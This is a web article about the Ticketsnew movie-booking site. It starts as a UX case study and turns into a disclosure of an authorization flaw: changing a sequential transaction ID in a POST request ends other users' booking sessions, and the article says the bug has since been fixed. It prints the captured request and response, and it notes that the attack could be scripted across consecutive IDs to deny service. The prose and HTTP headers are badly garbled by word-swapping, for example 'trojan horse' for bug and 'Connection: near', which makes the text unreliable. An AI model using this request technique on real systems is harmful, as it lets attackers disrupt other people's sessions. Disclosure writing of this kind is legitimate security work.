Overview of Ticketsnew
This case observation is based on a movie booking software ticketsnew. It is pretty famous, it has over 50 downloads on the Android App Store. This app affords the quality and cutting-edge vicinity to test for films and cinemas around you. Booking tickets is now an effortless, laugh, and thrilling enjoyment for its consumers. My major goal became to understand more about the problems ticketsnew App customers are facing currently and to introduce some additional capabilities so one can create a better user revel in and simplicity of use.
Problem Statement of Ticketsnew
To enhance the cutting-edge functions of the app and make the overall consumer enjoy of the app a good deal extra immersive and easy. On the idea of this preliminary problem statement, I started to dig deep into the topic by way of starting with consumer studies. Ticketsnew is an online portal to e-book film tickets in all of the essential cities in India. The employer was acquired by using PayTM and is backed by using Alibaba-Pictures because of its growing client base and easy UX.
Recently I discovered a trojan horse that might have stopped you from booking tickets from the website. While I was examining GET, and POST requests via intercepting requests for the usage of Burp Suite for the duration of the software I observed a POST request that turned used to expire my current consumer session. This request was given my interest as it had the transaction ID as a parameter.
Request
POST /calls/ExpiresOngoingTrans HTTP/1.1
Host: www.Ticketsnew.Com
Connection: near
Content-Length: 20
Accept: utility/json, textual content/javascript, */*; q=0.01
Origin: https://www.Ticketsnew.Com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.Zero (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.Zero.3904.97 Safari/537.36
Content-Type: software/json; charset=UTF-8
Sec-Fetch-Site: equal-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.Nine,en;q=0.8
Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk;
‘TransID’:60500852
My first concept turned into I need to attempt to expire different consumer sessions by changing the ID. I despatched the request to Burp Repeater and changed the ‘TransID’ with any other person consultation I had initiated in an incognito mode in an exclusive browser. And Boom, the session expired even earlier than the allocated time given by the ticketsnew.
Response on Ticketsnew
HTTP/1.1 200 OK
Cache-Control: personal, max-age=0
Content-Type: software/json; charset=utf-8
Date: Thu, 06 Feb 2020 21:04:17 GMT
Server: Microsoft-IIS/eight.Five
Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; route=/
Vary: Accept-Encoding
X-AspNet-Version: 4.Zero.30319
X-Powered-By: ASP.NET
Content-Length: nine
Connection: Close
“d”:”1″
Ticketsnew there’s no test on where the request comes from and whether or not changes to it authorizes. An interesting element I observed changed in the transaction IDs assigned to sessions have been in a sequence. So it became clear for me to predict the subsequent consultation IDs and ship the POST request. Or writing a script with non-stop IDs to send a POST request to them wouldn’t be difficult for all people. Using this trojan horse every person may want to prohibit a consumer from reserving tickets until they get frustrated and depart the website online inflicting ability revenue harm to the organisation.
Ticketsnew is a fairly big enterprise and PayTM being the figure company response become now not expert. However, because the computer virus is resolved, I have written this article following the right disclosure coverage.
Also read this: Click Here